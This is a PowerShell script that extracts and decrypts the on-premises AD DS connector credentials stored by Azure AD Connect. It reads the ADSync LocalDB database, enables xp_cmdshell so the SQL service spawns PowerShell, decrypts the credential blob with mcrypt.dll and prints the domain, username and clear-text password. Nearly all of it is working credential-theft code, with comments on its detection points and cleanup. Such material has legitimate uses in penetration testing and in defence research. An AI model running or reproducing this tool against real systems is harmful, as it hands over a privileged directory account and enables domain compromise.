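# Recovers the on-premises AD DS connector credentials stored by Azure AD Connect
# on the AD Connect server itself.
#
# What this script does, in order:
#   1. Finds sqllocaldb.exe and asks it which LocalDB instances exist; the ADSync
#      instance is matched loosely ('ADSy') because its name varies by version.
#   2. Opens the ADSync database and reads the key-set identifiers
#      (mms_server_configuration) plus the AD management agent row, which holds
#      the clear-text connector config and the encrypted credential blob
#      (mms_management_agent).
#   3. Enables xp_cmdshell and has the SQL service spawn powershell.exe "as the
#      service user"; that inner script loads mcrypt.dll, loads the key set and
#      decrypts the blob, printing the resulting XML.
#   4. Pulls domain/username out of the clear-text config, the password out of
#      the decrypted XML, and prints all three.
#
# Caveats for whoever runs this:
#   * mcrypt.dll is loaded from the default install path
#     'C:\Program Files\Microsoft Azure AD Sync\Bin\'. A non-default install shows
#     up as add-type error text in the xp_cmdshell output instead of XML; that raw
#     output is printed so the cause is visible.
#   * This is noisy. The sp_configure changes and a powershell.exe child of
#     sqlservr.exe are obvious detection points, and the password is written to
#     the console (and therefore to any transcript or script-block log). The two
#     sp_configure options are restored to their previous values on exit, which
#     the original version of this script did not do.
#   * No arguments. Every failure path prints a "[!]" line and returns.

# Runs $sql on $conn and returns the first row's column values as an object[],
# or $null when the query returns no rows. The data reader is always closed.
function Read-FirstRow {
    param([System.Data.SqlClient.SqlConnection]$conn, [string]$sql)
    $cmd = $conn.CreateCommand()
    $cmd.CommandText = $sql
    $reader = $cmd.ExecuteReader()
    try {
        if (-not $reader.Read()) { return $null }
        $values = New-Object object[] $reader.FieldCount
        [void]$reader.GetValues($values)
        # Leading comma keeps PowerShell from unrolling the array on return.
        return ,$values
    } finally {
        $reader.Close()
    }
}

# --- 1. Locate sqllocaldb.exe and the ADSync LocalDB instance -----------------
# More than one SQL Server version may ship a sqllocaldb.exe; any of them can list
# instances, so take the highest-versioned path instead of letting an array of
# paths leak into the command line.
$sqlbin = @(Get-ChildItem -Path 'C:\Program Files\Microsoft SQL Server\' -Filter sqllocaldb.exe -Recurse -ErrorAction SilentlyContinue |
            ForEach-Object { $_.FullName } | Sort-Object -Descending)
if ($sqlbin.Count -eq 0) {
    Write-Host "[!] sqllocaldb.exe not found under C:\Program Files\Microsoft SQL Server\"
    return
}
$sqlbin = $sqlbin[0]

# Invoke sqllocaldb directly (no cmd.exe hop, so the space-containing path is not
# re-parsed by cmd). Every line that looks like an ADSync instance is a candidate;
# when several match (e.g. after an upgrade left two instances) each is tried in
# turn rather than being string-joined into one broken Data Source.
$candidates = @(& $sqlbin info | ForEach-Object { "$_".Trim() } | Where-Object { $_ -match 'ADSy' })
if ($candidates.Count -eq 0) {
    Write-Host "[!] No ADSync instance listed by 'sqllocaldb info'"
    return
}

$client = $null
foreach ($db in $candidates) {
    $conn = New-Object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\$db;Initial Catalog=ADSync"
    try {
        $conn.Open()
        $client = $conn
        break
    } catch {
        $conn.Dispose()
    }
}
if ($null -eq $client) {
    Write-Host "[!] Could not connect to localdb..."
    return
}

# Original values of the two sp_configure options, captured before they are
# changed so the finally block can put them back.
$originalConfig = @{}

try {
    # --- 2. Key-set identifiers and the AD management agent row ---------------
    Write-Host "[*] Querying ADSync localdb (mms_server_configuration)"
    $row = Read-FirstRow $client "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
    if ($null -eq $row) {
        Write-Host "[!] Error querying mms_server_configuration"
        return
    }
    $key_id      = [int]$row[0]
    $instance_id = [guid]$row[1]
    $entropy     = [guid]$row[2]

    Write-Host "[*] Querying ADSync localdb (mms_management_agent)"
    $row = Read-FirstRow $client "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
    if ($null -eq $row -or $row[0] -is [DBNull] -or $row[1] -is [DBNull]) {
        Write-Host "[!] Error querying mms_management_agent"
        return
    }
    $config  = [string]$row[0]
    $crypted = [string]$row[1]

    # $crypted is spliced verbatim into a T-SQL string literal and into the
    # powershell.exe command line below. It is expected to be base64; refuse
    # anything else rather than let a stray quote break (or rewrite) either
    # command.
    if ($crypted -notmatch '^[A-Za-z0-9+/=\s]+$') {
        Write-Host "[!] encrypted_configuration is not base64; refusing to splice it into a command"
        return
    }

    # --- 3. Decrypt via xp_cmdshell ---------------------------------------------
    Write-Host "[*] Using xp_cmdshell to run some Powershell as the service user"

    # Record the current option values so they can be restored on exit; leaving
    # xp_cmdshell enabled is both a footprint and a weakening of the host.
    $cmd = $client.CreateCommand()
    $cmd.CommandText = "SELECT name, CAST(value_in_use AS int) FROM sys.configurations WHERE name IN ('show advanced options', 'xp_cmdshell')"
    $reader = $cmd.ExecuteReader()
    try {
        while ($reader.Read()) { $originalConfig[$reader.GetString(0)] = $reader.GetInt32(1) }
    } finally {
        $reader.Close()
    }

    $cmd = $client.CreateCommand()
    $cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
    [void]$cmd.ExecuteNonQuery()

    # Inner script: load mcrypt.dll, load the key set identified above, fetch
    # key 1 and decrypt the blob, printing the XML. Quoting layers: `" is a
    # literal double quote for the powershell.exe -c argument, '' is a single
    # quote inside the T-SQL literal, and `$ stops the inner variables from
    # expanding in this outer string.
    $cmd = $client.CreateCommand()
    $cmd.CommandText = "EXEC xp_cmdshell 'powershell.exe -c `"add-type -path ''C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key = `$null;`$km.GetActiveCredentialKey([ref]`$key);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted`"'"
    $reader = $cmd.ExecuteReader()
    $decrypted = [string]::Empty
    try {
        # xp_cmdshell returns one row per output line and a trailing NULL row;
        # rows are concatenated with no separator, exactly as before.
        while ($reader.Read() -and -not $reader.IsDBNull(0)) {
            $decrypted += $reader.GetString(0)
        }
    } finally {
        $reader.Close()
    }

    if ($decrypted -eq [string]::Empty) {
        Write-Host "[!] Error using xp_cmdshell to launch our decryption powershell"
        return
    }

    # --- 4. Extract and print -----------------------------------------------------
    $domain   = Select-Xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | Select-Object @{Name = 'Domain'; Expression = { $_.Node.InnerText }}
    $username = Select-Xml -Content $config -XPath "//parameter[@name='forest-login-user']"   | Select-Object @{Name = 'Username'; Expression = { $_.Node.InnerText }}
    try {
        $password = Select-Xml -Content $decrypted -XPath "//attribute" | Select-Object @{Name = 'Password'; Expression = { $_.Node.InnerText }}
    } catch {
        # Non-XML here is the inner powershell's own error text (for example
        # add-type failing because mcrypt.dll is not at the default path).
        Write-Host "[!] xp_cmdshell output was not XML; raw output follows:"
        Write-Host $decrypted
        return
    }

    Write-Host "Domain: $($domain.Domain)"
    Write-Host "Username: $($username.Username)"
    Write-Host "Password: $($password.Password)"
} finally {
    if ($client.State -eq [System.Data.ConnectionState]::Open) {
        # Put sp_configure back the way it was found. Only attempted when the
        # original values were actually captured, i.e. after the script got as
        # far as changing them.
        if ($originalConfig.Count -gt 0) {
            $xp  = if ($originalConfig.ContainsKey('xp_cmdshell')) { $originalConfig['xp_cmdshell'] } else { 0 }
            $adv = if ($originalConfig.ContainsKey('show advanced options')) { $originalConfig['show advanced options'] } else { 0 }
            try {
                $cmd = $client.CreateCommand()
                $cmd.CommandText = "EXEC sp_configure 'xp_cmdshell', $xp; RECONFIGURE; EXEC sp_configure 'show advanced options', $adv; RECONFIGURE;"
                [void]$cmd.ExecuteNonQuery()
            } catch {
                Write-Host "[!] Could not restore sp_configure options (xp_cmdshell may still be enabled)"
            }
        }
        $client.Close()
    }
}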